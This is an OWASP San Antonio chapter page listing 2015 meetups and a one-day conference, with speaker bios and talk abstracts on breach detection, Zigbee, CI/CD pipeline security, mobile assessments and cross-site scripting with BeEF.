Join us for the September 2015 OWASP San Antonio meeting! We will have a talk about detecting security breaches!


Speaker: Josh Sokol


Bio: Josh Sokol, CISSP, graduated from the University of Texas at Austin with a BS in Computer Science in 2002. Since that time, he has worked for several large companies, including AMD and BearingPoint, spent some time as a military contractor, and is currently employed as the Information Security Program Owner at National Instruments. In his current role, Sokol manages all compliance, security architecture, risk management, and vulnerability management activities for NI. Sokol created the free and open source risk management tool named SimpleRisk, has spoken on dozens of security topics including the much-hyped "HTTPS Can Byte Me" talk at Black Hat 2010, and currently serves on the OWASP Global Board of Directors.

Title: The Fox is in the Henhouse: Detecting a Breach Before the Damage is Done

Abstract: Your firewall is a sieve with more holes poked in it than your Grandmother's pin cushion, your IPS doesn't know a breach from a hole in the ground, and your signature-based anti-virus can't keep up with the ever changing tide of malware being hurled at you from every direction. It's time to take a deep breath and admit to ourselves that the traditional methods of keeping the bad guys out of our networks have failed us. Just over two years ago, we began focusing much of our efforts on incident detection and response. Rather than sinking our precious time and money into tools that would become obsolete before the next BlackHat, we decided to take the time to analyze our networks and got creative with different ways to find the systems that have been compromised that those other technologies couldn't detect. In this presentation, we will walk you through the analytics we are running, the tools that we are using, and the techniques that we employ to find and remediate the bad guys from our networks. Good security doesn't have to break the bank; it just has to break the mold.


OWASP San Antonio - August 28th @ 11:30am

Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the August 2015 OWASP San Antonio meeting! We will have a talk about building, sniffing and breaking Zigbee (IoT).


Speaker: David Lister

Bio: David Lister (CISSP, CASP, CCISO, CCNA, CEH, ECSA, CPT, RHCSA, Security+) has been active in various roles involving systems administration, network security, incident response, penetration testing, and application security. David holds a Master's degree in Infrastructure Assurance from the University of Texas San Antonio, and is a member of the ISSA, San Antonio Hackers Anonymous, and OWASP.

Title: Building, Sniffing, and Breaking Zigbee

Abstract: This will be a shallow dive into how you can get up and running with Zigbee, what it is and what it’s used for. Also covered will be some of the known ways to break Zigbee networks, and how this relates to application security.


Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

http://www.meetup.com/OWASP-San-Antonio/events/224725183/


OWASP San Antonio - July 31st @ 11:30am

Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the July 2015 OWASP San Antonio meeting! We will be having a talk about compromising Continuous Integration systems.


Speaker: Greg Anderson

Bio: Greg Anderson works for Rackspace where he helps to drive test automation and security.

Title: Is This Your Pipe? Compromising Build and Automation Pipelines

Abstract: As developers of the web, we rely on tools to automate building code, run tests, and even deploy services. What happens when developers do CI/CD wrong? Credentials get exposed, hijacked, and re-purposed. I'll talk about how often, where, and what happens when people leak public cloud credentials, how some are protecting themselves using encrypted secrets, how to bypass protections against leaking secrets and how to turn someone's Jenkins Install into your own butler. Come hijack credentials out of repositories, steal hidden and encrypted secrets using builds, and hijack infrastructure via continuous integration systems.


Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

http://www.meetup.com/OWASP-San-Antonio/events/223970537/


OWASP San Antonio - June 26th @ 11:30am

Denim Group - 1354 N Loop 1604 E Ste 110, San Antonio, TX

Join us for the June 2015 OWASP San Antonio meeting. We will be having a talk about Continuous Integration and Continuous Deployment (CI/CD) of OpenStack.


Speaker: Michael Xin

Bio: Michael Xin is working as a manager of security engineering at Rackspace. Before that, he worked as a senior application security engineer at Scottrade Inc. Michael is interested in web application / web service / API security, mobile application security and cloud security. Michael has years of experience with application security assessment, security code review and security SDLC.

Title: OpenStack Security CI/CD Way

Abstract: As OpenStack becomes popular, Continuous Integration and Continuous Deployment (CI/CD) of OpenStack is gaining attention. Customers need the ability to deploy multiple times every day to meet their business needs. This is a huge challenge to application security. Traditional web application security testing and API security testing are manual processes aided by various tools. The tests are time consuming and lack consistency. It is almost impossible to embed these types of security testing into the CI/CD process.

At Rackspace, the security engineering team is working with quality engineers and developers to integrate security testing into the CI/CD process. The security engineering team uses the same framework and tools that quality engineers use, to ease integration. Currently we are focusing on API security testing automation and web application security testing. We are working on a couple of approaches to integrate security test cases with the QE testing framework. The security test cases cover necessary security checks, including common security vulnerability checks and some product-specific checks. These security test cases can be run by anyone on the team. They can also be invoked as Jenkins jobs as part of the integration tests. Failed security test cases indicate some type of security defect and need to be remediated.

Security testing automation improves the consistency, repeatability and auditability of our security testing process. Security testing within the CI/CD process can detect security defects at an early stage and reduce remediation costs.

Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

http://www.meetup.com/OWASP-San-Antonio/events/223161579/

Slides: http://www.slideshare.net/michaelxin2015/openstack-security-cicd-way

Tools: https://github.com/stackforge/opencafe https://wiki.openstack.org/wiki/Security/Projects/Bandit


OWASP San Antonio - May 29, 2015 @ 11:30am

Denim Group - 1354 N Loop 1604 E Ste 110, San Antonio, TX

Join us for the May 2015 OWASP San Antonio meeting. We will be having a talk about Mobile Application Security Assessments.

Speaker: Dan Cornell

Bio: A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As Chief Technology Officer and Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process.

Title: Application Security Assessments By The Numbers: A Whole-Istic View

Abstract:

By analyzing the data from over 60 mobile application security assessments, we identify the typical types of mobile vulnerabilities, the system components that contain those vulnerabilities, the components where given types of vulnerabilities cluster, and how to test for each of these. Attendees will learn in the session how to identify these vulnerabilities, how to create and implement an effective mobile security plan, and where to focus their limited testing resources to minimize mobile application portfolio risks. This is critical because automated web application testing tools are able to easily find vulnerabilities, while today's mobile security industry does not offer automated testing tools that can effectively test web services (i.e. the interaction between mobile clients and back-end services). As a result, best practices for mobile application testing must incorporate significant, often laborious, manual testing. At this point in the presentation, we will use the statistics from the research to define the appropriate manual testing that needs to be implemented.

Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

http://www.meetup.com/OWASP-San-Antonio/events/222536787/


OWASP Invites You to Attend InnoTech San Antonio as our Guest

InnoTech, presented by Presidio, is San Antonio's premier IT and security focused conference & expo. We're celebrating eight years of education, technology and networking at this year's event and you won't want to miss it! Mark your calendars now and plan on attending!

Thursday, April 9, 2015 at the Henry B. Gonzalez Convention Center

A limited number of complimentary passes are available for InnoTech San Antonio. Please register at innotechsan.com and use the discount code that you received from your OWASP email list for complimentary admission. Includes coffee, lunch for the first 125 in line and afternoon reception.

Check out the list of speakers and technology demos by visiting http://www.innotechconferences.com/sanantonio/


OWASP San Antonio - March 20th 2015

On March 20th the OWASP San Antonio Chapter is having a FREE one-day, single-track conference featuring talks about secure software development, securing the SDLC and application security testing. Whether you're an information security professional, software developer, or just interested in computer security, anyone and everyone is welcome. We have an all-star set of speakers that will be covering all aspects of managing a security program as well as in-depth testing methodologies.

Map:

http://bit.ly/owasp-map

Full Program:

http://bit.ly/owasp-program

Schedule:


9:15 - 9:30 Welcome, Sign-in, kickoff

9:30 - 10:30: Keynote, Scaling an Application Security Program, Glenn Leifheit, Principal Security Architect, Microsoft

One of the largest challenges today is the rapid change in the speed of software. We will journey on the path of accelerating while maintaining security, from small startup to largest enterprise, from waterfall to agile. Along the way there will be lessons learned, from successes and failures. What steps can you take to bring security to the next level? Application security is not an easy profession; let's learn together to take us all to the next level.

About Glenn: Glenn Leifheit is Principal Security Architect for Microsoft Information Technology's ACE (Assessment, Consulting and Engineering) Team. In this role he provides security advice to Microsoft internally as well as to external customers. Prior to joining Microsoft, Glenn created, developed and led the application security program for FICO (Fair Isaac Corporation). He also led FICO's PCI program. He is a former co-chair and current member of the (ISC)2 Application Security Advisory Council, where he helps evangelize for strong application security and advocates for change throughout the industry. Through Glenn's 20-year career in information technology he has focused on security, architecture, OS and middleware design, and operations along with software development. Glenn holds both the CISSP and the CSSLP certifications. He is also passionate about evangelizing security practices to the development community, engaging in over 50 conferences, user groups and code camps as a speaker or panel member. Glenn is also a founding member of TechMasters, a Toastmasters group designed to create a technical speaker community.

10:30 - 11:30: Maximizing Security with Minimal Resources, Chris Maier, Principal Architect, Rackspace

Ever wonder how to intelligently spend your security dollars on the systems that matter most? Are you faced with the common problem of "I don't have an unlimited security budget but I am required to secure all the things"? This session will present concepts, methodologies, and tooling to help you identify your critical systems, set a prescriptive value on your data assets, and rank the systems and information in a way that helps highlight where you should focus your security efforts and dollars. We will also cover how to present this information in a manner that is more business focused, and how to ensure that the business understands the risk vs. reward of securing and protecting each of the assets.

About Chris: Chris Maier is a Principal Architect at Rackspace, and in his current role helps design and implement shared infrastructure systems in a secure and compliant manner. Chris has nearly 18 years of production operations experience on a variety of systems including email, identity, databases, directory servers, and a variety of application servers. Chris has written scripts and code in Bash, VB, Java, C, C++, and a little Python for many of the systems he has supported over the years. Because of the 10-plus years spent on identity and authentication systems, Chris is very cognizant of and familiar with a wide variety of security issues and security best practices. Some of Chris' previous positions have included primary DBA for a SOX & PCI compliant billing system, identity infrastructure lead engineer, hosted Exchange lead engineer, infrastructure systems lead engineer, and eLearning lead engineer.


11:30 - 12:45: Lunch (provided)

12:45 - 1:45: Convincing Your Management, Your Peers, and Yourself that Risk Management Doesn’t Suck, Josh Sokol, Information Security Program Owner, National Instruments

As security professionals, almost every action we take comes down to making a risk-based decision. Web application vulnerabilities, malware infections, physical vulnerabilities, and much more all boil down to some combination of the likelihood of an event happening and the impact of that event. Risk management is a relatively simple concept to grasp, but the place where many practitioners fall down is in the tool set.

The lucky security professionals work for companies who can afford expensive GRC tools to aid in managing risk. The unlucky majority out there usually end up spending countless hours managing risk via spreadsheets. It's cumbersome, time consuming, and just plain sucks. After starting a Risk Management program from scratch at a $1B/yr company, I ran into these same barriers, and where budget wouldn't let me go down the GRC route, I finally decided to do something about it. SimpleRisk is a simple and free tool to perform risk management activities.

Based entirely on open source technologies and sporting a Mozilla Public License 2.0, a SimpleRisk instance can be stood up in minutes and instantly provides the security professional with the ability to submit risks, plan mitigations, facilitate management reviews, prioritize for project planning, and track regular reviews. It is highly configurable and includes dynamic reporting and the ability to tweak risk formulas on the fly. It is under active development with new features being added all the time and can be downloaded for free or demoed at http://www.simplerisk.org. With a simple, powerful, and cost-effective tool and some basic risk management knowledge at your disposal, you too can become the security rock star that your business seeks out for risk-based decision making. Let me show you how to convince your management, your peers, and yourself that Risk Management doesn't suck.

About Josh: Josh Sokol, CISSP, graduated from the University of Texas at Austin with a BS in Computer Science in 2002. Since that time, he has worked for several large companies, including AMD and BearingPoint, spent some time as a military contractor, and is currently employed as the Information Security Program Owner at National Instruments. In his current role, Sokol manages all compliance, security architecture, risk management, and vulnerability management activities for NI. Sokol created the free and open source risk management tool named SimpleRisk, has spoken on dozens of security topics including the much-hyped "HTTPS Can Byte Me" talk at Black Hat 2010, and currently serves on the OWASP Global Board of Directors.


1:45 - 2:45: Automating Security Tests with Selenium, Brady Vitrano, Lead Quality Engineer, Rackspace, Charles Neill, Security Engineer, Rackspace

Rackspace Quality and Security Engineers are building a framework to automate both functional testing and security testing within the browser. To learn about the basics, this presentation looks at our approach to automating functional testing and security testing for web applications. You will learn about Selenium, and how to write some tests of your own. We will also teach you how to run your test cases using a Selenium grid to speed up the testing process.

About Brady: Brady is an aspiring mad scientist.

About Charles: Charles is a Security Developer - Test II for the Security Engineering team at Rackspace. He enjoys finding new vulnerabilities in everything from webapps to smart TVs.

Slides: https://www.owasp.org/images/4/49/Owasp_automation_talk.pptx


2:45 - 3:45: Making Security as Agile as Development: Adding DevOps and TDD to your security program, Matt Tesauro, Application Security Leader, Pearson

Software and application development are not slowing down. Is your AppSec program able to keep pace? With agile development, continuous deployment, DevOps, and Cloud, the pace of change in the software industry has only increased. As an AppSec professional, you face rapidly delivered services while making sure they are built reliably and securely. When you are deploying multiple times a day, there is no time to fit in your traditional week-long security assessment.

This talk will cover how Matt has put these practices in place at Pearson after doing similar work at Rackspace. What are the key ways to keep your AppSec program agile enough to keep up with the pace of change today? Methods will be discussed for securing infrastructure, apps, APIs and source code. Even if you are not in the DevOps, CI/CD world today, you will be soon enough. It's time to embrace the change and say "Challenge Accepted".

About Matt: Matt Tesauro is the Application Security Lead Engineer at Pearson and was previously the Senior Product Security Engineer at Rackspace. He is also an Adjunct Professor for the University of Texas Computer Science department, teaching the next generation of CS students about Application Security. Matt is a broadly experienced information security professional of 15 years, specializing in application and cloud security. He has also presented and provided trainings at various international industry events including the DHS Software Assurance Workshop, OpenStack Summit, SANS AppSec Summit, and AppSec US, EU and LATAM. His work has included security consulting, penetration testing, threat modeling, code reviews, training and teaching at Texas A&M University. He is a former board member of the OWASP Foundation and project lead for the OWASP WTE project, a collection of application security testing tools. He holds two degrees from A&M University and several security and Linux certifications.

3:45 - 4:00: Close


OWASP San Antonio Chapter - Feb 11 2015 @ 11:30am

Come to the first OWASP San Antonio meeting of 2015. We will be having a talk on BeEF - the Browser Exploitation Framework Project and discussing plans for the rest of 2015.

Speaker: Charles Neill

Bio: Charles is a Security Developer at Rackspace, where he does application security for products developed in-house, as well as OpenStack projects and other third-party products. He also develops tools to assist with security testing.

Title: Introduction to Cross-Site Scripting with BeEF

Abstract:

Cross-site scripting is a well-known attack vector at this point, but many people still don't understand the full risk of being vulnerable to it. BeEF is a framework that combines lots of different tools that can be useful to an attacker after finding a cross-site scripting bug in a site. The purpose of this talk is to demonstrate the potential severity of a cross-site scripting attack, leveraging BeEF to trick the user in various ways and to try to get as much useful information out of them as possible.

Slides: https://www.owasp.org/images/e/e1/Xss-owasp.pptx

Past Events

https://www.owasp.org/index.php/San_Antonio/pastEvents